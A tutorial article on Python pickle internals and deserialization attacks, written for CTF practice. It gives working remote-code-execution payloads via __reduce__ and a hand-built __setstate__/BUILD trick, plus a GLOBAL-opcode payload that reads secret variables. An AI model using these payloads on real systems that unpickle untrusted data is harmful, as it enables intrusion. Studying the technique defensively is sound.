

Detailed introduction of pickle deserialization in Python

Updated 2025-10-26. From: SLTechnology News&Howtos (shulou)


Shulou(Shulou.com)06/01 Report--

This article explains pickle deserialization in Python in detail. The content is simple, clear and easy to follow; just follow the editor's line of reasoning through the topic.

What is Python deserialization

Python deserialization is similar to PHP deserialization (I haven't looked at Java yet). Serialization turns the variables, dictionaries, object instances and so on that a program creates at run time into a string (a byte stream) that can be stored or transmitted; deserialization later turns that string back into objects, restoring the previously saved state.

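Python 2 has two main serialization libraries, pickle and cPickle, which differ only in speed: cPickle is the C implementation. In Python 3 the C implementation (_pickle) is used by pickle automatically, so you only need to import pickle.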

The common methods of pickle are

import pickle

a_list = ['a', 'b', 'c']

# pickle.dumps() serializes an object into a bytes string
# pickle.dump() serializes an object and writes it to a file
print(pickle.dumps(a_list, protocol=0))

# pickle.loads() deserializes an object from a bytes string
# pickle.load() deserializes an object by reading it from a file
print(pickle.loads(pickle.dumps(a_list, protocol=0)))

The string that pickle produces comes in several versions. In dump() or dumps() you choose the version with the protocol parameter; the code above, for example, uses version 0. load() and loads() detect the version from the data automatically. The protocols are numbered 0 to 4 (plus 5 since Python 3.8), and most Python 3 versions default to version 3. Version 0 is the most human-readable; later versions add many unprintable bytes, but these only serve as optimizations and the format is essentially the same. The good news is that newer Python versions can still read the older protocols: a version 0 string can be passed directly to pickle.loads() without any problem.

[Screenshot: output of serialization]

[Screenshot: reading the data back with deserialization]

As you can see, the serialized output differs somewhat between Python 2 and Python 3. We focus first on Python 3, the currently supported version, and cover Python 2 later when we give the exploits.

In Python 3.0 to 3.7 the default protocol is version 3; in Python 3.8, which is used here, the default is version 4.

Version 0 is the original "human-readable" protocol and is backward compatible with earlier versions of Python. Version 1 is an old binary format that is also compatible with earlier versions of Python. Version 2 was introduced in Python 2.3 and provides much more efficient pickling of new-style classes; see PEP 307 for the improvements it brings. Version 3 was added in Python 3.0. It has explicit support for bytes objects and cannot be unpickled by Python 2.x. It was the default protocol in Python 3.0 to 3.7 and is recommended when compatibility with other Python 3 versions is required. Version 4 was added in Python 3.4. It adds support for very large objects, pickling more kinds of objects, and some data format optimizations; see PEP 3154. Version 5, added in Python 3.8, adds support for out-of-band data (PEP 574).
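A minimal sketch for checking these protocol facts on your own interpreter is below. It uses only the standard library; the printed DEFAULT_PROTOCOL and HIGHEST_PROTOCOL values depend on your Python version, and io.BytesIO stands in for a real file opened in binary mode.

```python
import io
import pickle

a_list = ['a', 'b', 'c']

# The default and newest protocols of the running interpreter; the exact
# numbers depend on the Python version.
print(pickle.DEFAULT_PROTOCOL, pickle.HIGHEST_PROTOCOL)

for proto in range(pickle.HIGHEST_PROTOCOL + 1):
    blob = pickle.dumps(a_list, protocol=proto)
    # From protocol 2 on, a pickle starts with the PROTO opcode b'\x80'
    # followed by the version number.
    if proto >= 2:
        assert blob[:2] == bytes([0x80, proto])
    # loads() has no protocol argument: the version is read from the data.
    assert pickle.loads(blob) == a_list

# Protocol 0 is plain ASCII text, hence "human readable".
print(pickle.dumps(a_list, protocol=0))  # b'(lp0\nVa\np1\naVb\np2\naVc\np3\na.'

# dump()/load() do the same through a binary file object.
buf = io.BytesIO()
pickle.dump(a_list, buf, protocol=3)
buf.seek(0)
print(pickle.load(buf))  # ['a', 'b', 'c']
```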

For ease of analysis and compatibility, we use version 3 throughout.

C:\Users\Rayi\Desktop\Tmp\Script
λ python 1.py
b'(lp0\nVa\np1\naVb\np2\naVc\np3\na.'    # protocol 0
b'\x80\x03]q\x00(X\x01\x00\x00\x00aq\x01X\x01\x00\x00\x00bq\x02X\x01\x00\x00\x00cq\x03e.'    # protocol 3
b'\x80\x04\x95\x11\x00\x00\x00\x00\x00\x00\x00]\x94(\x8c\x01a\x94\x8c\x01b\x94\x8c\x01c\x94e.'    # protocol 4

Analysis of the deserialization process

Before exploiting deserialization vulnerabilities, we need to understand the process of python deserialization

Serialized strings are hard to analyze directly, so we use the pickletools module to help.

import pickle
import pickletools

a_list = ['a', 'b', 'c']
a_list_pickle = pickle.dumps(a_list, protocol=3)
print(a_list_pickle)
# optimize a pickled string (removes unused memo PUT opcodes)
a_list_pickle = pickletools.optimize(a_list_pickle)
print(a_list_pickle)
# disassemble a pickled string
pickletools.dis(a_list_pickle)

The opcodes, as defined in pickle.py, are listed below (see pickletools.py for detailed documentation of each one):

MARK           = b'('   # push special markobject on stack
STOP           = b'.'   # every pickle ends with STOP
POP            = b'0'   # discard topmost stack item
POP_MARK       = b'1'   # discard stack top through topmost markobject
DUP            = b'2'   # duplicate top stack item
FLOAT          = b'F'   # push float object; decimal string argument
INT            = b'I'   # push integer or bool; decimal string argument
BININT         = b'J'   # push four-byte signed int
BININT1        = b'K'   # push 1-byte unsigned int
LONG           = b'L'   # push long; decimal string argument
BININT2        = b'M'   # push 2-byte unsigned int
NONE           = b'N'   # push None
PERSID         = b'P'   # push persistent object; id is taken from string arg
BINPERSID      = b'Q'   # push persistent object; id is taken from stack
REDUCE         = b'R'   # apply callable to argtuple, both on stack
STRING         = b'S'   # push string; NL-terminated string argument
BINSTRING      = b'T'   # push string; counted binary string argument
SHORT_BINSTRING= b'U'   # push string; counted binary string argument < 256 bytes
UNICODE        = b'V'   # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE     = b'X'   # push Unicode string; counted UTF-8 string argument
APPEND         = b'a'   # append stack top to list below it
BUILD          = b'b'   # call __setstate__ or __dict__.update()
GLOBAL         = b'c'   # push self.find_class(modname, name); 2 string args
DICT           = b'd'   # build a dict from stack items
EMPTY_DICT     = b'}'   # push empty dict
APPENDS        = b'e'   # extend list on stack by topmost stack slice
GET            = b'g'   # push item from memo on stack; index is string arg
BINGET         = b'h'   # push item from memo on stack; index is 1-byte arg
INST           = b'i'   # build & push class instance
LONG_BINGET    = b'j'   # push item from memo on stack; index is 4-byte arg
LIST           = b'l'   # build list from topmost stack items
EMPTY_LIST     = b']'   # push empty list
OBJ            = b'o'   # build & push class instance
PUT            = b'p'   # store stack top in memo; index is string arg
BINPUT         = b'q'   # store stack top in memo; index is 1-byte arg
LONG_BINPUT    = b'r'   # store stack top in memo; index is 4-byte arg
SETITEM        = b's'   # add key+value pair to dict
TUPLE          = b't'   # build tuple from topmost stack items
EMPTY_TUPLE    = b')'   # push empty tuple
SETITEMS       = b'u'   # modify dict by adding topmost key+value pairs
BINFLOAT       = b'G'   # push float; arg is 8-byte float encoding

TRUE           = b'I01\n'  # not an opcode; see INT docs in pickletools.py
FALSE          = b'I00\n'  # not an opcode; see INT docs in pickletools.py

# Protocol 2 opcodes that appear in the disassemblies below
PROTO          = b'\x80'  # identify pickle protocol
NEWOBJ         = b'\x81'  # build object by applying cls.__new__ to argtuple
TUPLE1         = b'\x85'  # build 1-tuple from stack top
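To see that the table is enough to write a pickle by hand, here is a small sketch that assembles a few protocol-0 pickles and loads them. The byte strings are hand-written examples, not output copied from pickle.dumps; pickletools.genops lists the opcodes without executing them.

```python
import pickle
import pickletools

# Each pickle below is written by hand from the opcode table.
samples = {
    b'(I1\nI2\nl.': [1, 2],      # MARK, INT 1, INT 2, LIST, STOP
    b'(I1\nI2\nt.': (1, 2),      # same items, but TUPLE instead of LIST
    b'(Va\nI1\nd.': {'a': 1},    # MARK, UNICODE 'a', INT 1, DICT
    b'I01\n.': True,             # the TRUE pseudo-opcode from the table
    b'N.': None,                 # NONE
}

for blob, expected in samples.items():
    assert pickle.loads(blob) == expected
    # genops() only decodes the opcodes; nothing is executed.
    names = [op.name for op, arg, pos in pickletools.genops(blob)]
    print(names, '->', expected)
```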

According to the table above, this serialization example is easy to understand.

b'\x80\x03](X\x01\x00\x00\x00aX\x01\x00\x00\x00bX\x01\x00\x00\x00ce.'
    0: \x80 PROTO      3                # protocol version 3 is used
    2: ]    EMPTY_LIST                  # push an empty list onto the stack
    3: (    MARK                        # push a mark onto the stack
    4: X        BINUNICODE 'a'          # Unicode string
   10: X        BINUNICODE 'b'
   16: X        BINUNICODE 'c'
   22: e        APPENDS    (MARK at 3)  # pop the items above the mark at 3 and append them to the list
   23: .    STOP                        # pop the result off the stack; end
highest protocol among opcodes = 2
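The listing can also be reproduced programmatically. This sketch (assuming the same Python 3 behavior as in the article) compares the raw and optimized protocol-3 bytes for ['a', 'b', 'c'] and walks the opcodes with pickletools.genops, which yields the same information that dis() pretty-prints.

```python
import pickle
import pickletools

raw = pickle.dumps(['a', 'b', 'c'], protocol=3)
# The un-optimized form keeps a BINPUT ('q') after every memoized object.
print(raw)

# optimize() drops PUT/BINPUT opcodes that no GET ever refers to.
opt = pickletools.optimize(raw)
print(opt)  # b'\x80\x03](X\x01\x00\x00\x00aX\x01\x00\x00\x00bX\x01\x00\x00\x00ce.'
assert pickle.loads(opt) == pickle.loads(raw)

# genops() yields (opcode, arg, position) triples.
for op, arg, pos in pickletools.genops(opt):
    print(pos, op.name, arg)
```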

Let's take a look at another more complex example.

import pickle
import pickletools

class a_class():
    def __init__(self):
        self.age = 114514
        self.name = "QAQ"
        self.list = ["1919", "810", "qwq"]

a_class_new = a_class()
a_class_pickle = pickle.dumps(a_class_new, protocol=3)
print(a_class_pickle)
# disassemble the pickled string
pickletools.dis(a_class_pickle)

b'\x80\x03c__main__\na_class\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03JR\xbf\x01\x00X\x04\x00\x00\x00nameq\x04X\x03\x00\x00\x00QAQq\x05X\x04\x00\x00\x00listq\x06]q\x07(X\x04\x00\x00\x001919q\x08X\x03\x00\x00\x00810q\tX\x03\x00\x00\x00qwqq\neub.'
    0: \x80 PROTO      3
# GLOBAL pushes self.find_class(modname, name): it reads the next two newline-terminated strings
# as the arguments, here self.find_class('__main__', 'a_class'). Note that find_class differs between Python versions.
    2: c    GLOBAL     '__main__ a_class'
# BINPUT only stores the stack top in the memo; it does not affect deserialization
   20: q    BINPUT     0
# push an empty tuple onto the stack
   22: )    EMPTY_TUPLE
# NEWOBJ (see around line 2097 of pickletools.py; the line number depends on the version): the stack must hold
# a class (pushed by GLOBAL at 2) followed by a tuple (pushed at 22); cls.__new__(cls, *args) is called to create
# the instance with the arguments in the tuple, which is empty here
   23: \x81 NEWOBJ
   24: q    BINPUT     1
# push a new dictionary
   26: }    EMPTY_DICT
   27: q    BINPUT     2
# a mark
   29: (    MARK
# push the Unicode keys and their values
   30: X        BINUNICODE 'age'
   38: q        BINPUT     3
   40: J        BININT     114514
   45: X        BINUNICODE 'name'
   54: q        BINPUT     4
   56: X        BINUNICODE 'QAQ'
   64: q        BINPUT     5
   66: X        BINUNICODE 'list'
   75: q        BINPUT     6
   77: ]        EMPTY_LIST
   78: q        BINPUT     7
# another mark
   80: (        MARK
   81: X            BINUNICODE '1919'
   90: q            BINPUT     8
   92: X            BINUNICODE '810'
  100: q            BINPUT     9
  102: X            BINUNICODE 'qwq'
  110: q            BINPUT     10
# append the values after the mark at 80 to the list created at 77
  112: e            APPENDS    (MARK at 80)
# SETITEMS (see around line 1674 of pickletools.py): add any number of key/value pairs to an existing dict
#   Stack before: ... pydict markobject key_1 value_1 ... key_n value_n
#   Stack after:  ... pydict
  113: u        SETITEMS   (MARK at 29)
# BUILD finishes the object created at 23, via __setstate__ or an update of __dict__:
# if the object has a __setstate__ method, anyobject.__setstate__(argument) is called;
# otherwise the values are updated via anyobject.__dict__.update(argument).
# Note that this step can create new attributes or overwrite existing ones.
  114: b    BUILD
# pop the result off the stack and end
  115: .    STOP
highest protocol among opcodes = 2

That completes the more complex example.

We now have a general understanding of how serialization and deserialization work.
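The two key steps, NEWOBJ creating the instance without calling __init__ and BUILD filling in the attributes, can be observed directly. This sketch reuses a_class from the example; the init_calls counter, the with_setstate subclass and the module name pickle_demo are hypothetical additions, and the classes are registered in that throwaway module only so that find_class() can locate them however the snippet is run.

```python
import pickle
import sys
import types

# Throwaway module ("pickle_demo" is a hypothetical name) that will own the classes.
demo = types.ModuleType("pickle_demo")
sys.modules["pickle_demo"] = demo


class a_class():
    init_calls = 0  # counts __init__ calls, only for observation

    def __init__(self):
        a_class.init_calls += 1
        self.age = 114514
        self.name = "QAQ"
        self.list = ["1919", "810", "qwq"]


class with_setstate(a_class):
    def __setstate__(self, state):
        # When __setstate__ exists, BUILD calls it instead of __dict__.update().
        self.keys_seen = sorted(state)


for cls in (a_class, with_setstate):
    cls.__module__ = "pickle_demo"
    setattr(demo, cls.__name__, cls)

blob = pickle.dumps(a_class(), protocol=3)  # __init__ runs here
restored = pickle.loads(blob)               # NEWOBJ uses cls.__new__, no __init__
print(a_class.init_calls)                   # 1
print(restored.__dict__)                    # filled in by BUILD via __dict__.update()

blob2 = pickle.dumps(with_setstate(), protocol=3)
restored2 = pickle.loads(blob2)
print(restored2.__dict__)                   # {'keys_seen': ['age', 'list', 'name']}
```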

Vulnerability Analysis

RCE: the commonly used __reduce__

Most pickle deserialization challenges in CTFs are solved with __reduce__.

The opcode that triggers it is R (REDUCE).

# pickletools.py, line 1955
I(name='REDUCE',
  code='R',
  arg=None,
  stack_before=[anyobject, anyobject],
  stack_after=[anyobject],
  proto=0,
  doc="""Push an object built from a callable and an argument tuple.

  The opcode is named to remind of the __reduce__() method.

  Stack before: ... callable pytuple
  Stack after:  ... callable(*pytuple)

  The callable and the argument tuple are the first two items returned
  by a __reduce__ method.  Applying the callable to the argtuple is
  supposed to reproduce the original object, or at least get it started.
  If the __reduce__ method returns a 3-tuple, the last component is an
  argument to be passed to the object's __setstate__, and then the REDUCE
  opcode is followed by code to create setstate's argument, and then a
  BUILD opcode to apply  __setstate__ to that argument.

  If not isinstance(callable, type), REDUCE complains unless the
  callable has been registered with the copyreg module's
  safe_constructors dict, or the callable has a magic
  '__safe_for_unpickling__' attribute with a true value.  I'm not sure
  why it does this, but I've sure seen this complaint often enough when
  I didn't want to.
  """),

In short:

Take the top of the stack as args and pop it.

Take the new top of the stack as f and pop it.

Call f(*args) and push the result onto the stack.
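These three steps can be tried safely with a hand-written pickle in which the callable is the harmless builtins.len instead of a command. This is a minimal sketch; the payload is hand-assembled from the opcode table above rather than produced by pickle.dumps.

```python
import pickle
import pickletools

# GLOBAL builtins.len, then MARK + UNICODE 'abc' + TUPLE -> ('abc',), then REDUCE.
payload = b'cbuiltins\nlen\n(Vabc\ntR.'

pickletools.dis(payload)      # GLOBAL, MARK, UNICODE, TUPLE, REDUCE, STOP
print(pickle.loads(payload))  # REDUCE calls len(*('abc',)) -> 3
```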

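As long as the serialized string contains an R opcode, the callable it names is executed during deserialization, regardless of whether the class in the target program defines __reduce__. (__reduce__ itself only runs on the attacker's side, when the payload is generated with dumps.)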

For example:

import pickle
import pickletools

class a_class():
    def __init__(self):
        self.age = 114514
        self.name = "QAQ"
        self.list = ["1919", "810", "qwq"]

    def __reduce__(self):
        return (__import__('os').system, ("whoami",))

a_class_new = a_class()
a_class_pickle = pickle.dumps(a_class_new, protocol=3)
print(a_class_pickle)
# disassemble the pickled string
pickletools.dis(a_class_pickle)

b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
    0: \x80 PROTO      3
    2: c    GLOBAL     'nt system'
   13: q    BINPUT     0
   15: X    BINUNICODE 'whoami'
   26: q    BINPUT     1
   28: \x85 TUPLE1
   29: q    BINPUT     2
   31: R    REDUCE
   32: q    BINPUT     3
   34: .    STOP
highest protocol among opcodes = 2

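Feed the generated payload to an ordinary program that has no __reduce__ at all, and the command is still executed when the program calls pickle.loads on it.

Try to generate the payload with a Python version that matches the target. The platform matters too: os.system is pickled under its defining module, so a payload generated on Windows refers to nt.system (as above), while one generated on Linux refers to posix.system.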
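One way to convince yourself that __reduce__ only runs on the generating side is sketched below: the class records a (callable, args) pair at dumps() time, the class is then deleted, and loads() still calls the callable. The harmless builtin len stands in for os.system; this is an illustration, not the article's payload.

```python
import pickle
import pickletools


class rayi(object):
    def __reduce__(self):
        # Runs inside pickle.dumps(); it only records (callable, args).
        # The harmless builtin len stands in for os.system.
        return (len, ("whoami",))


payload = pickle.dumps(rayi(), protocol=3)
del rayi  # the loading side does not need the class at all

# genops() lists the opcodes without running them: GLOBAL builtins.len ... REDUCE.
ops = [op.name for op, arg, pos in pickletools.genops(payload)]
print(ops)

# Loading executes len("whoami") and returns its result instead of a rayi object.
print(pickle.loads(payload))  # 6
```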

# coding=utf-8
import pickle
import urllib.request
# Python 2:
# import urllib
import base64

class rayi(object):
    def __reduce__(self):
        # without importing the os module
        return (__import__('os').system, ("whoami",))
        # return eval, ("__import__('os').system('whoami')",)
        # return map, (__import__('os').system, ('whoami',))
        # return map, (__import__('os').system, ['whoami'])

        # with the os module imported
        # return (os.system, ('whoami',))
        # return eval, ("os.system('whoami')",)
        # return map, (os.system, ('whoami',))
        # return map, (os.system, ['whoami'])
        # note: map() is lazy in Python 3, so the map variants only run the command under Python 2

a_class = rayi()
result = pickle.dumps(a_class)
print(result)
print(base64.b64encode(result))
# Python 3
print(urllib.request.quote(result))
# Python 2
# print urllib.quote(result)

Including and overriding global variables: the c opcode

The payloads in the two examples above both begin with the c opcode (GLOBAL):

I(name='GLOBAL',
  code='c',
  arg=stringnl_noescape_pair,
  stack_before=[],
  stack_after=[anyobject],
  proto=0,
  doc="""Push a global object (module.attr) on the stack.

  Two newline-terminated strings follow the GLOBAL opcode.  The first is
  taken as a module name, and the second as a class name.  The class
  object module.class is pushed on the stack.  More accurately, the
  object returned by self.find_class(module, class) is pushed on the
  stack, so unpickling subclasses can override this form of lookup.
  """),

In short, the c opcode can fetch the value of any global xxx.xxx (module.name) and push it onto the stack.
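Two things follow from the GLOBAL documentation: c can fetch any module attribute, not just classes, and the lookup goes through find_class(), which an Unpickler subclass can override. The sketch below shows both; the second part follows the "Restricting Globals" pattern from the Python pickle documentation, and the ALLOWED set is a hypothetical allow-list you would adapt to your own data.

```python
import io
import math
import pickle

# GLOBAL ('c') just pushes module.name; it does not have to be a class.
print(pickle.loads(b'cmath\npi\n.') == math.pi)  # True


class RestrictedUnpickler(pickle.Unpickler):
    """Overrides find_class(), the hook named in the GLOBAL doc."""

    # Hypothetical allow-list: only these globals may be loaded.
    ALLOWED = {('builtins', 'list'), ('builtins', 'dict')}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Plain containers need no GLOBAL at all, so they still load.
print(restricted_loads(pickle.dumps(['a', 'b', 'c'], protocol=3)))  # ['a', 'b', 'c']
try:
    restricted_loads(b'cmath\npi\n.')
except pickle.UnpicklingError as exc:
    print(exc)  # global 'math.pi' is forbidden
```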

Look at the following example

import secret
import pickle
import pickletools

class flag():
    def __init__(self, a, b):
        self.a = a
        self.b = b

# new_flag = pickle.dumps(flag('A', 'B'), protocol=3)
# print(new_flag)
# pickletools.dis(new_flag)

your_payload = b'?'
other_flag = pickle.loads(your_payload)
secret_flag = flag(secret.a, secret.b)

if other_flag.a == secret_flag.a and other_flag.b == secret_flag.b:
    print('flag{xxxxxx}')
else:
    print('Notification')

# secret.py
# you can not see this
a = 'aaaa'
b = 'bbbb'

If we don't know the values in secret.py, how can we construct a payload that satisfies the condition and get the flag?

We use the c opcode.

First, this is how an ordinary flag object is serialized:

λ python app.py
b'\x80\x03c__main__\nflag\nq\x00)\x81q\x01}q\x02(X\x01\x00\x00\x00aq\x03X\x01\x00\x00\x00Aq\x04X\x01\x00\x00\x00bq\x05X\x01\x00\x00\x00Bq\x06ub.'
    0: \x80 PROTO      3
    2: c    GLOBAL     '__main__ flag'
   17: q    BINPUT     0
   19: )    EMPTY_TUPLE
   20: \x81 NEWOBJ
   21: q    BINPUT     1
   23: }    EMPTY_DICT
   24: q    BINPUT     2
   26: (    MARK
   27: X        BINUNICODE 'a'
   33: q        BINPUT     3
   35: X        BINUNICODE 'A'
   41: q        BINPUT     4
   43: X        BINUNICODE 'b'
   49: q        BINPUT     5
   51: X        BINUNICODE 'B'
   57: q        BINPUT     6
   59: u        SETITEMS   (MARK at 26)
   60: b    BUILD
   61: .    STOP
highest protocol among opcodes = 2

The block between the MARK at 26 and SETITEMS at 59 supplies the attribute values: 'A' at offset 35 for a, and 'B' at offset 51 for b. We edit the payload by hand and replace these two values with secret.a and secret.b:

Original:
b'\x80\x03c__main__\nflag\nq\x00)\x81q\x01}q\x02(X\x01\x00\x00\x00aq\x03X\x01\x00\x00\x00Aq\x04X\x01\x00\x00\x00bq\x05X\x01\x00\x00\x00Bq\x06ub.'

Now:
b'\x80\x03c__main__\nflag\nq\x00)\x81q\x01}q\x02(X\x01\x00\x00\x00aq\x03csecret\na\nq\x04X\x01\x00\x00\x00bq\x05csecret\nb\nq\x06ub.'

We have successfully pulled in the variables from secret.py.
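The hand-edited payload can be checked end to end without the real challenge files. In this sketch, which is a stand-in rather than the original setup, secret is faked with types.ModuleType and the flag class lives in a hypothetical module named ctf_app instead of __main__, so the payload starts with cctf_app\nflag\n; the BINPUT opcodes are dropped because nothing reads the memo.

```python
import pickle
import sys
import types

# Hypothetical stand-in for secret.py: the attacker never reads these values.
secret = types.ModuleType("secret")
secret.a, secret.b = "aaaa", "bbbb"
sys.modules["secret"] = secret

# Hypothetical module "ctf_app" that holds the challenge's flag class.
ctf_app = types.ModuleType("ctf_app")
sys.modules["ctf_app"] = ctf_app


class flag():
    def __init__(self, a, b):
        self.a = a
        self.b = b


flag.__module__ = "ctf_app"
ctf_app.flag = flag

payload = (
    b"\x80\x03cctf_app\nflag\n)\x81}("  # PROTO, GLOBAL, EMPTY_TUPLE, NEWOBJ, EMPTY_DICT, MARK
    b"X\x01\x00\x00\x00acsecret\na\n"   # key 'a' -> value pushed by GLOBAL secret.a
    b"X\x01\x00\x00\x00bcsecret\nb\n"   # key 'b' -> value pushed by GLOBAL secret.b
    b"ub."                              # SETITEMS, BUILD, STOP
)

other_flag = pickle.loads(payload)
secret_flag = flag(secret.a, secret.b)
if other_flag.a == secret_flag.a and other_flag.b == secret_flag.b:
    print('flag{xxxxxx}')
```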

RCE: the BUILD opcode

Remember the BUILD opcode mentioned earlier?

I(name='BUILD',
  code='b',
  arg=None,
  stack_before=[anyobject, anyobject],
  stack_after=[anyobject],
  proto=0,
  doc="""Finish building an object, via __setstate__ or dict update.

  Stack before: ... anyobject argument
  Stack after:  ... anyobject

  where anyobject may have been mutated, as follows:

  If the object has a __setstate__ method,

      anyobject.__setstate__(argument)

  is called.

  Else the argument must be a dict, the object must have a __dict__, and
  the object is updated via

      anyobject.__dict__.update(argument)
  """),

By combining the BUILD opcode with the c opcode, we can replace an object's __setstate__ with os.system or another function.

Suppose a class does not define a __setstate__ method. We can then BUILD an object of this class with {'__setstate__': os.system}.

When this BUILD runs, there is no __setstate__ method, so __dict__.update is used instead, and the object's __setstate__ attribute is set to the os.system we specified.

If we then BUILD the object again with "ls /" as the argument, __setstate__("ls /") is called; since __setstate__ is now os.system, the command runs and we have RCE.

Let's see how this is done.

Again, take the flag class as an example.

import pickle
import pickletools

class flag():
    def __init__(self):
        pass

new_flag = pickle.dumps(flag(), protocol=3)
print(new_flag)
pickletools.dis(new_flag)
# your_payload = b'...'
# other_flag = pickle.loads(your_payload)

λ python app.py
b'\x80\x03c__main__\nflag\nq\x00)\x81q\x01.'
    0: \x80 PROTO      3
    2: c    GLOBAL     '__main__ flag'
   17: q    BINPUT     0
   19: )    EMPTY_TUPLE
   20: \x81 NEWOBJ
   21: q    BINPUT     1
   23: .    STOP
highest protocol among opcodes = 2

Next, we build the payload by hand.

According to BUILD's documentation, the argument must be a dictionary, so first push an empty dict (}) after NEWOBJ:

b'\x80\x03c__main__\nflag\nq\x00)\x81}.'

Next, fill the dictionary. First push a MARK:

b'\x80\x03c__main__\nflag\nq\x00)\x81}(.'

Then push the key/value pair and add it to the dict with SETITEMS (u):

b'\x80\x03c__main__\nflag\nq\x00)\x81}(V__setstate__\ncos\nsystem\nu.'

The first BUILD:

b'\x80\x03c__main__\nflag\nq\x00)\x81}(V__setstate__\ncos\nsystem\nub.'

Push the argument:

b'\x80\x03c__main__\nflag\nq\x00)\x81}(V__setstate__\ncos\nsystem\nubVwhoami\n.'

The second BUILD:

b'\x80\x03c__main__\nflag\nq\x00)\x81}(V__setstate__\ncos\nsystem\nubVwhoami\nb.'

Done.

Let's try it.

It works: we achieved RCE without using the R opcode.

Rayi-de-shenchu\rayi
    0: \x80 PROTO      3
    2: c    GLOBAL     '__main__ flag'
   17: q    BINPUT     0
   19: )    EMPTY_TUPLE
   20: \x81 NEWOBJ
   21: }    EMPTY_DICT
   22: (    MARK
   23: V        UNICODE    '__setstate__'
   37: c        GLOBAL     'os system'
   48: u        SETITEMS   (MARK at 22)
   49: b    BUILD
   50: V    UNICODE    'whoami'
   58: b    BUILD
   59: .    STOP
highest protocol among opcodes = 2
[Finished in 0.2s]
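The same two-BUILD trick can be observed without running a shell command. In this sketch the victim class sits in a hypothetical module ctf_app, and a hypothetical demo_sink.record function (simply list.append on a list) takes the place of os.system, so we can see that the second BUILD calls the injected __setstate__ with 'whoami'.

```python
import pickle
import sys
import types

# Hypothetical modules: "ctf_app" holds the victim class, "demo_sink.record"
# plays the role of os.system so the effect can be observed safely.
ctf_app = types.ModuleType("ctf_app")
demo_sink = types.ModuleType("demo_sink")
demo_sink.calls = []
demo_sink.record = demo_sink.calls.append
sys.modules.update({"ctf_app": ctf_app, "demo_sink": demo_sink})


class flag():
    def __init__(self):
        pass


flag.__module__ = "ctf_app"
ctf_app.flag = flag

payload = (
    b"\x80\x03cctf_app\nflag\n)\x81"           # PROTO, GLOBAL, EMPTY_TUPLE, NEWOBJ
    b"}(V__setstate__\ncdemo_sink\nrecord\nu"  # {'__setstate__': demo_sink.record}
    b"b"                                       # 1st BUILD: no __setstate__ yet -> __dict__.update
    b"Vwhoami\nb"                              # 2nd BUILD: calls obj.__setstate__('whoami')
    b"."                                       # STOP
)

obj = pickle.loads(payload)
print(demo_sink.calls)  # ['whoami']
```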

There is not much difference in python2:

import pickle
import pickletools
import urllib

class rayi():
    def __init__(self):
        pass

new_rayi = pickle.dumps(rayi(), protocol=2)
print(urllib.quote(new_rayi))
pickletools.dis(new_rayi)
# your_payload = '\x80\x02(c__main__\nrayi\nq\x00oq\x01}q\x02(V__setstate__\ncos\nsystem\nubVwhoami\nb.'
# other_rayi = pickle.loads(your_payload)
# pickletools.dis(your_payload)

Output:

%80%02%28c__main__%0Arayi%0Aq%00oq%01%7Dq%02b.
    0: \x80 PROTO      2
    2: (    MARK
    3: c        GLOBAL     '__main__ rayi'
   18: q        BINPUT     0
   20: o        OBJ        (MARK at 2)
   21: q    BINPUT     1
   23: }    EMPTY_DICT
   24: q    BINPUT     2
   26: b    BUILD
   27: .    STOP
highest protocol among opcodes = 2
[Finished in 0.1s]

Modify payload:

%80%02%28c__main__%0Arayi%0Aq%00oq%01%7Dq%02(V__setstate__\ncos\nsystem\nubVwhoami\nb.

import pickle
import pickletools
import urllib

class rayi():
    def __init__(self):
        pass

# new_rayi = pickle.dumps(rayi(), protocol=2)
# print(urllib.quote(new_rayi))
# pickletools.dis(new_rayi)
your_payload = urllib.unquote('%80%02%28c__main__%0Arayi%0Aq%00oq%01%7Dq%02(V__setstate__\ncos\nsystem\nubVwhoami\nb.')
other_rayi = pickle.loads(your_payload)
pickletools.dis(your_payload)

Thank you for reading; that concludes this detailed introduction to pickle deserialization in Python. I hope it has given you a deeper understanding of the topic; the specific techniques still need to be verified in practice.


© 2024 shulou.com SLNews company. All rights reserved.
